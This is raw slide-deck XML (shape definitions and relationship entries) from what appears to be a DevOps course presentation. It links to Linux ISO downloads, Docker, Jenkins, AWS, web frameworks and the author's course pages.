          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5003" name="Google Shape;5003;g2f97625d7ca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4" name="Google Shape;5004;g2f97625d7ca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82b29994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82b29994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8" name="Shape 5008"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5009" name="Google Shape;5009;g31ed20cc22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0" name="Google Shape;5010;g31ed20cc22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3" name="Shape 5013"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5014" name="Google Shape;5014;g31ed20cc22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5" name="Google Shape;5015;g31ed20cc22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9" name="Shape 5019"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5020" name="Google Shape;5020;g31bea298f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1" name="Google Shape;5021;g31bea298f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4" name="Shape 5024"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5025" name="Google Shape;5025;g31bea298f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6" name="Google Shape;5026;g31bea298f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9" name="Shape 5029"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5030" name="Google Shape;5030;g31bea298fb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1" name="Google Shape;5031;g31bea298fb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4" name="Shape 5034"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5035" name="Google Shape;5035;g31ed20cc22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6" name="Google Shape;5036;g31ed20cc22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9" name="Shape 5039"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5040" name="Google Shape;5040;g31ed20cc2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1" name="Google Shape;5041;g31ed20cc2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5" name="Shape 5045"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5046" name="Google Shape;5046;g31ed20cc22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7" name="Google Shape;5047;g31ed20cc22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0" name="Shape 5050"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5051" name="Google Shape;5051;g31ed20cc2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2" name="Google Shape;5052;g31ed20cc2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9" name="Shape 5059"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5060" name="Google Shape;5060;g31ed20cc22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1" name="Google Shape;5061;g31ed20cc22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cd1b66c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ecd1b66c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82b29994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82b29994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4" name="Shape 5064"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5065" name="Google Shape;5065;g31ed20cc22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6" name="Google Shape;5066;g31ed20cc22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9" name="Shape 5069"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5070" name="Google Shape;5070;g31ed20cc22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1" name="Google Shape;5071;g31ed20cc22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4" name="Shape 5074"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5075" name="Google Shape;5075;g31ed20cc22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6" name="Google Shape;5076;g31ed20cc22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0" name="Shape 5080"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5081" name="Google Shape;5081;g2f7fe5c1bb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2" name="Google Shape;5082;g2f7fe5c1bb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71faa4835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71faa4835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df22ce671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df22ce671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df22ce671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df22ce671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df22ce671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df22ce671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6de6b1261b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6de6b1261b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6de6b1261b_3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6de6b1261b_3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6de6b1261b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6de6b1261b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4419e6fa6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4419e6fa6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e33edea9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e33edea9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6de6b1261b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6de6b1261b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86ef0573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86ef0573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45384ca0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45384ca0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45384ca0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45384ca02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45384ca02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45384ca02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4419e6fa6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4419e6fa6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43fe6efe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43fe6efe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454f3ed5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454f3ed5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4419e6fa6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4419e6fa6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454f3ed5d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454f3ed5d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6de6b1261b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6de6b1261b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2.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5.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www.kernel.org/"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kernel.org"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ftp.iij.ad.jp/pub/linux/fedora/fedora/linux/releases/40/Everything/x86_64/iso/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://old.kali.org/kali-images/kali-1.0.0/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://repo.almalinux.org/almalinux/9.4/isos/x86_64/AlmaLinux-9.4-x86_64-minimal.iso" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dl-cdn.alpinelinux.org/alpine/v3.20/releases/x86_64/alpine-extended-3.20.0-x86_64.iso" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://repo.almalinux.org/almalinux/9.4/isos/x86_64/AlmaLinux-9.4-x86_64-dvd.iso" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dl-cdn.alpinelinux.org/alpine/v3.20/releases/x86_64/alpine-standard-3.20.0-x86_64.iso" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://yum.oracle.com/oracle-linux-isos.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.rockylinux.org/pub/rocky/8/isos/x86_64/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://repo.almalinux.org/almalinux/9/isos/x86_64/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.repo.cloudlinux.com/cloudlinux/9/iso/x86_64/"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5.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hyperlink" Target="https://hub.docker.com/r/jrei/systemd-ubuntu"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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="about:blank" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="about:blank"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github.com/anildalar/How-To-Setup-a-Reverse-Proxy-with-IP-and-Port/blob/master/How-To-Setup-a-Reverse-Proxy-with-IP-and-Port.txt" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anildalar/How-To-Setup-a-Reverse-Proxy-with-IP-and-Port/blob/master/How-To-Setup-a-Reverse-Proxy-with-IP-and-Port.txt"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hyperlink" Target="https://i.redd.it/jvgrxwm9w5461.png"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hyperlink" Target="https://docs.google.com/document/d/1BkSzX4Im0DD04zelDhU84CaAMesc5J6zYTCR8riSPd4/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://subscription.packtpub.com/book/data/9781788474221/1/ch01lvl1sec15/installing-and-configuring-ubuntu-desktop-for-google-cloud-platform"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hyperlink" Target="https://www.nginx.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://httpd.apache.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tomcat.apache.org/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lighttpd.net/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iis.net/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://puma.io/"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heynode.com/tutorial/install-nodejs-locally-nvm/"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ubdomain.primarydomain.tld" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://subdomain.primarydomain.tld" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://frontend.dollorinfotech.com"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6.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5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hyperlink" Target="https://docs.google.com/presentation/d/1oaTaX3Big1V8h4SYlqW2iZXxNBaT6iBCweDhJqx69LU/edit?usp=sharing"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hyperlink" Target="https://www.amazon.in/Kingston-FURY-3200MHz-SODIMM-KF432S20IB/dp/B097TN561M/ref=sr_1_2_sspa?crid=LAKCLSUBS1D7&amp;keywords=kingston+fury+8gb+ddr4+3200&amp;qid=1690599032&amp;sprefix=kingston+fury+16gb+ddr4+3200%2Caps%2C197&amp;sr=8-2-spons&amp;sp_csd=d2lkZ2V0TmFtZT1zcF9hdGY&amp;psc=1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.in/Western-Digital-Internal-500GBfor-Performance/dp/B09ZYPTXS4/ref=sr_1_3?keywords=ssd%2Bwd%2Bblue%2B500gb&amp;qid=1690599227&amp;sprefix=ssd%2Bwb%2Bblue%2Caps%2C206&amp;sr=8-3&amp;th=1"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hyperlink" Target="https://www.docker.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hub.docker.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crunchbase.com/organization/docker"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7.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hyperlink" Target="https://wslstorestorage.blob.core.windows.net/wslblob/wsl_update_x64.msi"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hyperlink" Target="https://labs.play-with-docker.com/"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47.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4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53.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50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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90.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5.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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6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68.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6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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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3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63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.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70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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7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hyperlink" Target="https://nextjs.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://react.dev/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vuejs.org/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://angular.io/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nuxt.com/"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hyperlink" Target="https://www.djangoproject.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://expressjs.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://moleculer.services/" TargetMode="Externa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hyperlink" Target="https://nodejs.org/e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hyperlink" Target="https://nextjs.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://react.dev/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vuejs.org/" TargetMode="Externa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77.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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88.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79.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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hyperlink" Target="https://docs.docker.com/compose/compose-file/compose-file-v3/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/compose/compose-file/compose-file-v2/" TargetMode="Externa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00.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82.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hyperlink" Target="https://www.mongodb.com/try/download/compass" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redis.com/redis-enterprise/redis-insight/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sqlitestudio.pl/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cassandra.apache.org/_/quickstart.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/downloads/workbench/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/downloads/workbench/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/downloads/workbench/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pgadmin.org/downloa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hyperlink" Target="https://www.jenkins.io/doc/book/installing/linux/" TargetMode="Externa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hyperlink" Target="https://www.jenkins.io/doc/book/installing/linux/"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78.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80.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83.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hyperlink" Target="https://jira.dollorinfotech.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jira.dollorinfotech.com"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91.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.anildollor.in" TargetMode="Externa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93.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.jp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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.jp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hyperlink" Target="https://youtube.com/oklabsguru" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dollorinfotech.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:dollorinfotech@gmail.com" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/in/anildalar" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anildalar" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://t.me/oklab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hyperlink" Target="https://console.aws.amazon.com/" TargetMode="Externa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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.jp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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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jp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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://e.printstacktrace.blog/jenkins-pipeline-environment-variables-the-definitive-guide/" TargetMode="Externa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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.jp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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anildalar/9Sept2023_GitLab_aws_Jenkins/tree/main" TargetMode="Externa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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/new"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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mattermost.com/blog/how-to-create-a-full-ci-cd-pipeline-with-jenkins/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jennykibiri.hashnode.dev/jenkins-pipeline-to-build-and-deploy-a-frontend-application-on-aws-ec2" TargetMode="Externa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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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3.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.djangoproject.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flask.palletsprojects.com/en/2.3.x/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubyonrails.org/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://laravel.com/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spring.io/projects/spring-framework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://expressjs.com/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://moleculer.services/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nestjs.com/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spring.io/projects/spring-boot" TargetMode="Externa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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://targetjobs.co.uk/careers-advice/skills-for-getting-a-job/problem-solving-mark-independent-employee" TargetMode="Externa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4.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://next.dollorinfotech.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://next.dollorinfotech.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://next.dollorinfotech.com" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://next.dollorinfotech.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://next.dollorinfotech.com" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.djangoproject.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anildalar/How-To-Setup-a-Reverse-Proxy-with-IP-and-Port/blob/master/How-To-Setup-a-Reverse-Proxy-with-IP-and-Port.txt" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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4.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.jp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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud-init.io/" TargetMode="Externa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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud-init.io/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud-init.io/" TargetMode="Externa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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.jp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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/cli/latest/userguide/getting-started-install.html" TargetMode="Externa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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.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25.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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.jp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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.jp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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3.console.aws.amazon.com/s3/buckets/oklabsbucket?region=ap-south-1" TargetMode="Externa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3.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.how2shout.com/add-a-new-key-pair-to-your-exisitng-aws-ec2-instances/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jennykibiri.hashnode.dev/jenkins-pipeline-to-build-and-deploy-a-frontend-application-on-aws-ec2" TargetMode="Externa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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.jp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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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udemy.com/course/mastering-devops-with-anil-dollor-2023/?referralCode=230B1BAB93602C62B90C" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.udemy.com/course/mastering-devops-with-anil-dollor-2023/?referralCode=230B1BAB93602C62B90C" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.udemy.com/course/mastering-devops-with-anil-dollor-2023/?referralCode=230B1BAB93602C62B90C" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.udemy.com/course/mastering-devops-with-anil-dollor-2023/?referralCode=230B1BAB93602C62B90C" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.udemy.com/course/mastering-devops-with-anil-dollor-2023/?referralCode=230B1BAB93602C62B90C" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.udemy.com/course/mastering-devops-with-anil-dollor-2023/?referralCode=230B1BAB93602C62B90C" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 